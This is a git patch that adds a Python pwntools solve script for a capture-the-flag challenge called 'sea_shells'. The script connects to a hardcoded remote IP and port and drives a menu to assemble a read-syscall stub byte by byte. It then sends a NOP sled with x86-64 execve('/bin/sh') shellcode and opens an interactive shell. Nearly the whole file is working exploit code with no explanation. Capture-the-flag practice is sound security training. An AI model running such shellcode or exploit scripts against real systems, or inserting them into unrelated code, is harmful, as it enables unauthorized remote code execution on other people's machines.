From 031201a421c692741ecaf2e396594588da8e109c Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Mon, 18 Nov 2024 19:52:31 +0300
Subject: [PATCH] solve script

---
 p3rf3ctr00t_ctf_2024/sea_shells/a.py | 65 ++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 p3rf3ctr00t_ctf_2024/sea_shells/a.py

diff --git a/p3rf3ctr00t_ctf_2024/sea_shells/a.py b/p3rf3ctr00t_ctf_2024/sea_shells/a.py
new file mode 100644
index 0000000..008d6a5
--- /dev/null
+++ b/p3rf3ctr00t_ctf_2024/sea_shells/a.py
@@ -0,0 +1,65 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./challenge", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1243)
+
+# funcs
+s = lambda a: r.sendline(a)
+inc = lambda: r.sendline(b"2")
+
+# read
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+s(b"4")
+s(b"3")
+s(b"5") # 89
+inc()
+for i in range(2): s(b"4")
+for i in range(2): s(b"3")
+for i in range(5): s(b"6")
+s(b"5") # d6
+inc()
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+for i in range(4): s(b"3")
+for i in range(6): s(b"6")
+s(b"5") # 31
+inc()
+for i in range(2): s(b"4")
+for i in range(3): s(b"6")
+s(b"3")
+s(b"5") # d2
+inc()
+for i in range(2): s(b"4")
+for i in range(9): s(b"6")
+for i in range(2): s(b"3")
+s(b"5") # b2
+inc()
+for i in range(17): s(b"5") # ff
+inc()
+s(b"5") # 0f
+inc()
+for i in range(2): s(b"3")
+s(b"5")
+for i in range(6): s(b"6") # 05
+s(b"7")
+
+# execve
+sc = """
+lea rdi, [rsi+35]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file